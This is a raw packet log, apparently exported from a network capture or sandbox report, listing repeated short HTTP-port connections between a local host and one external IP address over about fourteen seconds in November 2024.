                                                                                                                                                              Nov 6, 2024 17:39:19.428266048 CET5021280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:19.428843021 CET5021380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:19.618762016 CET8050213150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:19.618982077 CET8050212150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:19.619019985 CET5021380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:19.619220972 CET5021280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:19.619472027 CET5021380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:19.619472027 CET5021380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:19.807193041 CET8050213150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:19.807204008 CET8050213150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:19.882658958 CET8050213150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:19.893836021 CET5021380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:19.894295931 CET5021480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.082590103 CET8050213150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.082791090 CET5021380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.082856894 CET8050214150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.083125114 CET5021480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.083268881 CET5021480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.083270073 CET5021480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.271948099 CET8050214150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.272047997 CET8050214150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.342334032 CET8050214150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.352857113 CET5021480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.353301048 CET5021580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.541420937 CET8050214150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.541596889 CET5021480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.541836977 CET8050215150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.542004108 CET5021580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.542124987 CET5021580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.542124987 CET5021580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.730444908 CET8050215150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.730459929 CET8050215150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.804198980 CET8050215150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:20.816235065 CET5021580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:20.816695929 CET5021680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.004904032 CET8050215150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.004951000 CET8050216150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.005148888 CET5021580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.005150080 CET5021680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.005336046 CET5021680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.005336046 CET5021680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.194772005 CET8050216150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.194793940 CET8050216150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.265969992 CET8050216150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.277889013 CET5021680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.278419971 CET5021780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.466186047 CET8050216150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.466376066 CET8050217150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.466414928 CET5021680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.466521978 CET5021780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.466660023 CET5021780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.466701031 CET5021780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.655339956 CET8050217150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.655348063 CET8050217150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.733516932 CET8050217150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.746225119 CET5021780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.746541977 CET5021880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.934242010 CET8050218150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.934284925 CET8050217150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:21.934463978 CET5021880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.934508085 CET5021780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.934659004 CET5021880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:21.934659004 CET5021880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.122354984 CET8050218150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.122426987 CET8050218150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.190470934 CET8050218150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.205991030 CET5021880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.206708908 CET5021980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.393791914 CET8050218150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.394066095 CET5021880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.394594908 CET8050219150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.394845963 CET5021980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.395483971 CET5021980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.395483971 CET5021980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.583812952 CET8050219150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.583857059 CET8050219150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.653430939 CET8050219150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.665020943 CET5021980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.665682077 CET5022080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.853313923 CET8050219150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.853352070 CET8050220150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:22.854018927 CET5021980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.854216099 CET5022080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.854216099 CET5022080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:22.854216099 CET5022080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.042216063 CET8050220150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.042227030 CET8050220150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.113133907 CET8050220150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.124825001 CET5022080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.125327110 CET5022180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.313251019 CET8050220150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.313354969 CET8050221150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.313446999 CET5022080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.313514948 CET5022180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.313730955 CET5022180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.313730955 CET5022180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.501785994 CET8050221150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.501799107 CET8050221150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.577893019 CET8050221150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.588692904 CET5022180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.589157104 CET5022280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.777168036 CET8050221150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.777206898 CET8050222150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.777329922 CET5022280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.777378082 CET5022180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.777508974 CET5022280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.777508974 CET5022280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:23.965718985 CET8050222150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:23.965734005 CET8050222150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:24.029295921 CET8050222150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:24.056437016 CET5022280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:24.057084084 CET5022380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:24.244663000 CET8050222150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:24.244846106 CET5022280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:24.245151043 CET8050223150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:24.245357037 CET5022380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:24.245433092 CET5022380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:24.245433092 CET5022380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:24.434056044 CET8050223150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:24.434097052 CET8050223150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:24.801639080 CET8050223150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:24.850732088 CET5022380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:24.980859041 CET5022380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:24.981468916 CET5022480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.169188976 CET8050223150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.169565916 CET8050224150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.169997931 CET5022480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.170005083 CET5022380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.170012951 CET5022480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.170012951 CET5022480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.358405113 CET8050224150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.358417988 CET8050224150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.430087090 CET8050224150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.443100929 CET5022480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.443639994 CET5022580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.631652117 CET8050224150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.631661892 CET8050225150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.631887913 CET5022480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.631956100 CET5022580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.632085085 CET5022580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.632085085 CET5022580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.820590973 CET8050225150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.820599079 CET8050225150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.893178940 CET8050225150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:25.904819965 CET5022580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:25.905297995 CET5022680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.092628956 CET8050225150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.092804909 CET5022580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.093441010 CET8050226150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.093624115 CET5022680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.093744040 CET5022680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.093744040 CET5022680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.281858921 CET8050226150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.281867027 CET8050226150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.352617979 CET8050226150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.366761923 CET5022680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.367233992 CET5022780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.555186033 CET8050226150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.555197954 CET8050227150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.555483103 CET5022680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.555483103 CET5022780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.555567980 CET5022780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.555655003 CET5022780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.743742943 CET8050227150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.743849993 CET8050227150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.813851118 CET8050227150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:26.825073004 CET5022780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:26.825567961 CET5022880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.013457060 CET8050228150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.013499975 CET8050227150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.013700008 CET5022880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.013701916 CET5022780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.013859034 CET5022880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.013859034 CET5022880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.201860905 CET8050228150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.201869965 CET8050228150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.271158934 CET8050228150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.284197092 CET5022880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.285114050 CET5022980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.472347975 CET8050228150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.472717047 CET5022880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.473407030 CET8050229150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.473613977 CET5022980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.473721027 CET5022980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.473721981 CET5022980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.662204027 CET8050229150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.662245035 CET8050229150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.732779980 CET8050229150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.752140045 CET5022980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.753462076 CET5023080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.940829992 CET8050229150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.941066027 CET5022980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.941673994 CET8050230150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:27.941920996 CET5023080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.941981077 CET5023080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:27.941981077 CET5023080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.130307913 CET8050230150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.130348921 CET8050230150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.201185942 CET8050230150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.216974974 CET5023080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.217760086 CET5023180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.405356884 CET8050230150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.405366898 CET8050231150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.405513048 CET5023080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.405513048 CET5023180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.405688047 CET5023180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.405688047 CET5023180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.593597889 CET8050231150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.593610048 CET8050231150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.661720991 CET8050231150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.675633907 CET5023180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.675947905 CET5023280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.863794088 CET8050232150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.863810062 CET8050231150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:28.864067078 CET5023280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.864067078 CET5023180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.864204884 CET5023280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:28.864204884 CET5023280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:29.052490950 CET8050232150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:29.052504063 CET8050232150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:29.418344975 CET8050232150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:29.428977966 CET5023280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:29.429394960 CET5023380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:29.617264032 CET8050233150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:29.617311954 CET8050232150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:29.617528915 CET5023280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:29.617528915 CET5023380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:29.617693901 CET5023380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:29.617693901 CET5023380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:29.805872917 CET8050233150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:29.805915117 CET8050233150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:29.875307083 CET8050233150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:29.890011072 CET5023380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:29.890465021 CET5023480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.078178883 CET8050233150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.078227997 CET8050234150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.078396082 CET5023380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.078397036 CET5023480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.078609943 CET5023480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.078609943 CET5023480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.266494036 CET8050234150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.266535044 CET8050234150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.336656094 CET8050234150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.357042074 CET5023480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.358047962 CET5023580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.545125008 CET8050234150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.545399904 CET5023480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.546581030 CET8050235150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.546780109 CET5023580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.546844006 CET5023580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.546844006 CET5023580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.734941959 CET8050235150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.734957933 CET8050235150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.805772066 CET8050235150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:30.818425894 CET5023580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:30.819097042 CET5023680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.006376028 CET8050235150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.006553888 CET5023580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.006947041 CET8050236150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.007165909 CET5023680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.007287979 CET5023680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.007333040 CET5023680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.195887089 CET8050236150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.195895910 CET8050236150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.265975952 CET8050236150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.277312994 CET5023680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.277728081 CET5023780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.465187073 CET8050236150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.465452909 CET5023680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.468338966 CET8050237150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.468547106 CET5023780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.468693972 CET5023780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.468739986 CET5023780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.657051086 CET8050237150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.657063961 CET8050237150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.724172115 CET8050237150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.738953114 CET5023780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.739820957 CET5023880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.927304983 CET8050237150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.927565098 CET5023780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.928056002 CET8050238150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:31.928298950 CET5023880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.928479910 CET5023880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:31.928479910 CET5023880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:32.116255999 CET8050238150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:32.116728067 CET8050238150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:32.477148056 CET8050238150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:32.498879910 CET5023880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:32.499504089 CET5023980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:32.687197924 CET8050238150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:32.687254906 CET8050239150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:32.687328100 CET5023880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:32.687463999 CET5023980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:32.687633038 CET5023980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:32.687633038 CET5023980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:32.875387907 CET8050239150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:32.875396013 CET8050239150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:32.942903042 CET8050239150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:32.953757048 CET5023980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:32.954200983 CET5024080192.168.11.20150.241.91.218
